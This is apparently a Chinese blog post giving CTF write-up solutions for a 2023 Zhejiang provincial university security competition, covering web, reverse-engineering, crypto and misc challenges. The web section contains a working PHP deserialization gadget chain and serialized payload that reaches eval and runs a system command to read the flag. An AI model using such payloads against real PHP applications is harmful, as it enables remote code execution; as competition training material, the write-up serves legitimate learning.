2023浙江省大学生信息与网络安全竞赛wp

最新推荐文章于 2024-06-05 16:52:30 发布
最新推荐文章于 2024-06-05 16:52:30 发布
阅读量706 收藏 3
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/superstudent2333/article/details/134244654
版权

很爽,今年给队内大爷带飞了,希望复赛也能躺

Web

1.ezphp

PHP反序列化,var_dump触发BBB,通过BBB中的param1触发CCC,通过CCC中的$this->func->aaa()触发AAA执行任意代码

exp如下

<?php
highlight_file(___FILE___);  
class AAA{
    public $cmd;  
  
    public function __call($name, $arguments){
        eval($this->cmd);  
        return "done";
    }  
}
​
class BBB{
    public $param1;  
  
    public function __debuginfo(){
        return [
            'debugInfo' => 'param1' . $this->param1
        ];
    }  
}
​
class CCC{
    public $func;  
  
    public function __toString(){
        var_dump("aaa");
        $this->func->aaa();
    }  
}
​
// if(isset($_GET['aaa'])){  
//     $aaa = $_GET['aaa'];  
//     var_dump(unserialize($aaa));  
// }
$ccc = new CCC();
$bbb = new BBB();
$aaa = new AAA();
$aaa->cmd = "system('cat /flag');";
$ccc->func = $aaa;
$bbb->param1 = $ccc;  
echo serialize($bbb);  
  
  
?>

然后提交get参数aaa

?aaa=O:3:"BBB":1:{s:6:"param1";O:3:"CCC":1:{s:4:"func";O:3:"AAA":1:{s:3:"cmd";s:20:"system('cat /flag');";}}}

3.can you read flag

执行命令

tmp目录找到readflag源码

通过readflag源码发现,计算100-200次可以得出flag

RE

1.pyccc

pyc文件,使用逆向软件得到源代码

a = input('please input your flag:\n')
check = [
    102,
    109,
    99,
    100,
    127,
    52,
    114,
    88,
    97,
    122,
    85,
    125,
    105,
    127,
    119,
    80,
    120,
    112,
    98,
    39,
    109,
    52,
    55,
    106]
if len(a) == 24:
    for i in range(len(a)):
        if check[i] == ord(a[i]) ^ i:
            continue
            print(yes)
​
        print('nononono')
    continue
else:
    print('nononono')

发现他是对于每一个上面字符1-24的i值进行异或然后得到flag,那我们可以手动解密得到flag

check=[102,109,99,100,127,52,114,88,97,122,85,125,105,127,119,80,120,112,98,39,109,52,55,106]
flag = ""
for i in range(1,len(check)):
    flag = flag + chr(check[i]^i)
print(flag)
#flag{1t_is_very_hap4y!!}
3.easyapk

下载的附件丢到GDA里面反编译 然后找到密文和iv

密钥是,将reversecarefully中的e换成3

反编译APK,得出加密算法AES/CBC/Pkcs5 秘钥r3v3rs3car3fully IV:0123456789ABCDEF 然后aes解密得出flag

Crypto

1.小小数学家

一串数学题全部解出来68658367847012357100564949514849455056499845521025297455610049974598515698101999910250505653125

使用脚本转ascii码得到flag

s = '68658367847012357100564949514849455056499845521025297455610049974598515698101999910250505653125'
temp = ''
​
while len(s):
    if int(s[:3]) < 127:
        temp += chr(int(s[:3]))
        s = s[3:]
    else:
        temp += chr(int(s[:2]))
        s = s[2:]
print(temp)
#DASCTF{9d811301-281b-4f4a-8d1a-b38beccf2285}
​

MISC

1.number game

断点执行

然后赋值

然后停止断点就有个含有flag信息的弹窗

3.Ez_misc

看见一个图,发现有很熟悉的文件头FF 8D FF 0E

对应JPG文件头FF D8 FF E0

用两个脚本处理一下文件

f = open('yuanshen', "rb")  # 打开要读取的二进制文件
hex_list = ["{:02X}".format(c) for c in f.read()]  # 将文件内容转换为十六进制字符串列表
f.close()
​
hex_str = ''.join(hex_list)  # 将列表中的字符串连接成一个字符串
reversed_hex_str = hex_str[::-1]  # 将字符串反转
​
reversed_bytes = bytes.fromhex(reversed_hex_str)  # 将反转后的十六进制字符串转换为字节流
​
with open('4', 'wb') as f:  # 打开一个新的二进制文件,将反转后的字节流写入其中
    f.write(reversed_bytes)
with open("4","rb") as f:
    a=f.read()[::-1]
    with open("5","wb") as new:
        new.write(a)

得到jpg图片

对其使用steghide破解,得到flag.txt

DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDASHDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT DASHDASHDOTDOTDOT DASHDASHDOTDOTDOT DASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DASHDASHDASHDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DASHDASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DASHDASHDOTDOTDOT DASHDOTDOT

dash和dot一眼摩斯,转换一下

-.... -.... -.... -.-. -.... .---- -.... --... --... -... -.... ....- -.... -.... ...-- ....- -.... -.... ...-- -.... ...-- ...-- ...-- ..... -.... .---- -.... ..--- ...-- ...-- ...-- ....- ...-- ..--- -.... .---- ...-- ..... -.... ..--- ...-- ...-- -.... ..--- -.... ..--- ...-- ---.. ...-- ..... ...-- ..... -.... .---- ...-- ....- ...-- -.... ...-- ....- -.... ....- ...-- --... -.... ..--- -.... ..--- ...-- ....- -.... ..... -.... ...-- --... -..

摩斯解密得到

666C61677B64663466363335616233343261356233626238353561343634643762623465637D

在hex解密得到flag

flag{df4f635ab342a5b3bb855a464d7bb4ec}

superstudent2333
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2021江西省网络安全职业技能竞赛赛题wp全!
12-21
对应靶场下载地址https://www.syjshare.com/res/V8HA5H1V
广东省2023技能大赛网络安全赛项 C模块wp
04-20
通过广东省2023技能大赛网络安全赛项B模块的解题思路的锻炼,选手们不仅能够提升自己的网络安全技能水平,还能够培养自己的逻辑思维能力和团队协作精神。这些能力在未来的学习和工作中都将发挥重要作用,为他们在...
2022 第五届 浙江省大学生网络信息安全竞赛技能赛 预赛 Writeup,5题
小哈里的博客
09-18 3775
将1718896489转为16进制0x66744769,并交换前后4位得到0x47696674,再转回10进制,得到第3个问题的答案1198089844。进入check3,发现第3个问题的答案为交换前后四位二进制后,结果等于1718896489的值。进入check2,发现第2个问题的答案为根号3025和2401,暴力得到结果为55和49。丢进PE,发现是32位exe文件,然后丢进IDA32。运行程序并依次输入3个问题的答案,得到flag。
2023浙江省大学生信息安全竞赛初赛RE:AndriodELF
firfis的博客
11-18 110
这个看起来比较复杂,但实际的功能就是对加密的一个块(16个字节)中的字节进行交换,打乱顺序。可知:flag长度为64,分4个块分别进行加密(即每次加密16个字节)。该函数的作用的就是将块中的每一个字节的高3位与低5位的位置进行互换。可知:每次加密会进行16次循环,加密细节又分为4个部分。该函数的作用的就是将块中的每一个字节进行反转,例如:使。查看字符串,找到wrong,交叉引用找到关键函数。的仅仅只是起一个暂存的作用。那么现在就可以编写逆向脚本了。中的索引来进行交换。分别查看这4个部分。
第六届浙江省大学生网络信息安全竞赛-技能挑战赛部分WP
jjjj1029056414的博客
11-09 1239
第六届浙江省大学生网络信息安全竞赛-技能挑战赛部分WP,整理复盘。
第五届浙江省大学生网络信息安全竞赛预赛 部分WP
weixin_46356548的博客
09-17 2128
第五届浙江省大学生网络信息安全竞赛-技能挑战赛 预赛 部分WP
2023浙江省大学生信息安全竞赛初赛 部分wp
arcuied
11-05 1107
将这段js复制处理,放入console,把if的判断条件改为true,然后再次点击roll,可以发现弹。后端就只有个js文件,可以发现roll这段代码很关键(因为题目说通过roll得到flag)拿到题目,根据jpg的文件头,可以发现每两位16进制是反的,那么我们只需要翻转就行了。反转之后的结果并不是正确的(因为是逆序的十六进制),我们还需要将整体的字符串反。根据摩斯密码的特征,及那个DASH转为-,DOT转为.,获得下面的代码。使用steghide进行解密,获得flag.txt。数据放入010中生成图片。
第六届浙江省大学生网络信息安全竞赛 2023 初赛/决赛 WEB方向 Writeup
Jay17的博客
11-15 1600
第六届浙江省大学生网络信息安全竞赛 2023 初赛/决赛 WEB方向 Writeup 初赛缺Java、决赛缺MySQL8、Java
2023浙江省大学生信息安全竞赛初赛misc方向wp
toto的博客
11-04 2054
但这样子恢复出来的图像有点问题卡了很久,后来发现有几个点原像素的频率值比背景(211,211,211)的频率还高。每个文字基本上RGB差不多,盲猜是把原图每个像素替换成一个文字了,测量后每个文字所在正方形为16*16。绝大多数情况下背景频率最高,原像素就是频率第二高的RGB值,直接选取sorted_dict[1]即可。简单读取一个16*16正方形的像素后发现由于图片压缩导致部分文字像素有渐进,同时可以看出背景像素为。得到的flag.txt很明显是摩斯,连变量名都对应好了,DASH替换为。
第五届浙江省网络信息安全竞赛部分WP
hahaHalsey的博客
09-18 870
后续再补充
广东省2023技能大赛网络安全赛项 中职 B模块wp
04-20
广东省2023技能大赛网络安全赛项B模块的解题思路,不仅是选手们展示自身网络安全技能的平台,更是对选手们逻辑思维、实践能力和团队协作精神的全面考验。在这个模块中,选手们需要针对特定的网络安全问题,进行深入...
广东省2023技能大赛网络安全赛项 中职 D模块wp
04-20
通过广东省2023技能大赛网络安全赛项B模块的解题思路的锻炼,选手们不仅能够提升自己的网络安全技能水平,还能够培养自己的逻辑思维能力和团队协作精神。这些能力在未来的学习和工作中都将发挥重要作用,为他们在...
WP29汽车信息安全信息安全管理系统》.pdf
08-10
联合国汽车标准化组织WP29牵头制定的智能网联汽车《WP29汽车信息安全信息安全管理系统》,对车联网安全做出规范要求与保障
网络安全的神秘世界】JavaScript
weixin_54750312的博客
06-05 1167
2003之前,JavaScript被称为“牛皮藓”,用来制作页面上的广告、弹窗、漂浮的广告2004,JavaScript命运开始改变,谷歌公司开始带头使用Ajax技术2007,JavaScript在移动中不可或缺JavaScript对初学者比较友好、简单易用。可以使用任何文本编辑工具编写,只需要浏览器就可以执行程序JavaScript是有界面效果的(相比之下,C语言只有白底黑字)avaScript是弱变量类型的语言,变量只需要用 var/let/const 来声明。
汇总 |国内外医疗器械网络安全法规与标准
网 安 云
06-05 581
国内外关于医疗器械网络安全的法规和标准日益完善,旨在确保医疗器械在全生命周期内的网络安全,保障患者信息的安全和隐私,以及医疗器械的正常运行。不同国家和地区的法规和标准各有侧重,但都强调了医疗器械制造商、开发者、经营者和使用者应当遵守网络安全相关法律法规,采取相应的安全控制措施。
网络安全的神秘世界】使用vulhub搭建漏洞测试靶场
weixin_54750312的博客
05-31 370
Vulhub是一个基于docker和的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
网络安全实战基础——实战工具与攻防环境介绍
最新发布
Dijkstra's Monk-ey的博客
06-05 879
实战集成工具虚拟机VMware Workstation:大家熟知的虚拟机Virtual Box:开源免费、轻量级Kali Linux工具集信息收集BlackArch LinuxMetasploit集成在Kali Linux系统中基本模块如下:渗透模块 辅助模块 攻击载荷模块 Shellcode模块其他渗透工具集成系统 1. 报错型注入(Union Select),包括字符串型和数字型报错型注入(基于二次注入)盲注,包括普通判定注入和基于时间的注入。更新查询注入。插入查询注入。HTTP头部注入
网络安全的神秘世界】在win11搭建pikachu靶场
weixin_54750312的博客
05-31 801
这个错误发生在mysql 5.7 版本及以上版本会出现的问题,在mysql5.7版本默认的sql配置是:sql_mode=“ONLY_FULL_GROUP_BY”,这个配置严格执行了"SQL92标准",很多从5.6升级到5.7时,为了语法兼容,大部分都会选择调整sql_mode,使其保持跟5.6一致,为了尽量兼容程序。访问http://pikachu/install.php,这是pikachu自带的初始化数据库的php文件。ok,重新访问首页(index.php),进行测试,成功解决。点击“安装/初始化”
2023羊城杯密码wp
09-18
根据提供的引用内容,我们可以得出以下结论: 1. 引用给出了一个数学公式 C = A * M,其中 C包含flag的字符。 2. 引用提到了coppersmith算法,只要知道p的高位,就可以解密密码。 3. 引用介绍了一个函数corrupt(),它可以随机改变矩阵A中的元素,但有很大的可能性存在两行或更多的行没有发生变化。 根据提供的信息,我无法直接回答关于2023羊城杯密码的问题。因为这需要更多的上下文信息和算法知识。请您提供更多关于密码的相关信息,以便我可以帮助您解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值